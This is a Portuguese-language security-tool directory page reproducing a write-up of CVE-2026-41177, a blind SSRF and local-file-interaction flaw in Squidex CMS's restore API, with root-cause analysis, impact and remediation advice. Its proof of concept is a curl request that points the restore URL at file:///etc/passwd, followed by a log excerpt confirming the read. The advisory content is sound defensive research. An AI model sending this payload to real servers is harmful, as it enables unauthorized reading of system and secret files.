Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41177-Squidex-CMS — CVE-2026-41177, uma vulnerabilidade de SSRF cego no Squidex CMS (anterior à v7.23.0). Inclui análise da causa raiz, etapas de reprodução e avaliação de impacto referente à Interação com Arquivos Locais (LFI). | Kitploit
Ferramentas/GitHubGitHub/turkios/cve-2026-41177-squidex-cms
Análise de VulnerabilidadesExploraçãoSegurança WebAprendizado e Educação
GitHubturkios/cve-2026-41177-squidex-cms

CVE-2026-41177-Squidex-CMS

CVE-2026-41177, uma vulnerabilidade de SSRF cego no Squidex CMS (anterior à v7.23.0). Inclui análise da causa raiz, etapas de reprodução e avaliação de impacto referente à Interação com Arquivos Locais (LFI).

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41177: SSRF Cego no Squidex CMS

Pesquisa e análise técnica para CVE-2026-41177: Uma vulnerabilidade de Server-Side Request Forgery (SSRF) Cego na API de Restauração do Squidex CMS.

Visão Geral da Vulnerabilidade

  • ID CVE: CVE-2026-41177
  • Componente Afetado: API do Squidex: Mecanismo de Backup / Restauração (/api/apps/restore)
  • Versões Afetadas: < 7.23.0
  • Tipo de Vulnerabilidade: SSRF Cego (CWE-918), Interação com Arquivos Locais (CWE-73)

Resumo

A API de Restauração do Squidex é vulnerável a Server-Side Request Forgery (SSRF) Cego. A aplicação não valida o esquema de URI do parâmetro Url fornecido pelo usuário, permitindo o uso do protocolo file://. Isso permite que um administrador autenticado force o servidor backend a interagir com o sistema de arquivos local, levando à Interação com Arquivos Locais (LFI) e à possível divulgação de informações sensíveis do sistema por meio de análise de canal lateral dos logs internos.

Detalhes

  1. Configuração: Um atacante cria um job de "Restauração" usando um URI do sistema de arquivos local (por exemplo, file:///etc/passwd).
  2. Acionamento: O atacante envia a solicitação POST para o endpoint de restauração.
  3. Execução: O backend aceita a solicitação e passa a URL para um worker em segundo plano (RestoreJob).
  4. Observação: Embora a resposta da API seja um genérico 204 No Content, os logs internos do servidor revelam que o servidor abriu e leu o arquivo com sucesso antes de falhar porque o conteúdo não era um arquivo ZIP válido.

Prova de Conceito (PoC)

1. Solicitação Maliciosa

Execute o seguinte comando curl (substitua <TOKEN> por um token de administrador válido):

root@kitploit:~
curl -X POST http://localhost/api/apps/restore/ \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "Url": "file:///etc/passwd",
    "Name": "exploit-poc"
  }' -v

2. Validação por meio de Logs

O seguinte erro nos logs do contêiner do Squidex confirma a interação interna com o arquivo:

root@kitploit:~
{
  "logLevel": "Error",
  "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
  "exception": {
    "type": "System.IO.InvalidDataException",
    "message": "End of Central Directory record could not be found.",
    "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
  }
}

Nota: A InvalidDataException confirma que o servidor acessou e leu os bytes do arquivo com sucesso.

Impacto

Esta vulnerabilidade permite que atacantes autenticados:

  • Reconhecimento do Sistema de Arquivos: Confirmar a presença de arquivos sensíveis (por exemplo, appsettings.json, segredos).
  • Divulgação de Informações: Em ambientes multi-tenant, isso poderia potencialmente ser usado para acessar os arquivos de backup de outros usuários.

Remediação

  • Atualização: Atualize para a versão 7.23.0 ou posterior do Squidex.
  • Lista de Permissões de Protocolo: Permita estritamente apenas os esquemas http:// e https://.
  • Validação de Entrada: Implemente uma verificação para rejeitar qualquer URI que use o esquema file:// antes do processamento.
  • Tratamento Seguro de E/S: Garanta que os manipuladores subjacentes sejam restritos à resolução do sistema de arquivos local para entradas fornecidas pelo usuário.

Referências

  • Aviso de Segurança do GitHub (GHSA-45fq-w37p-qfw5)
  • Registro Oficial do CVE
Baixar ferramenta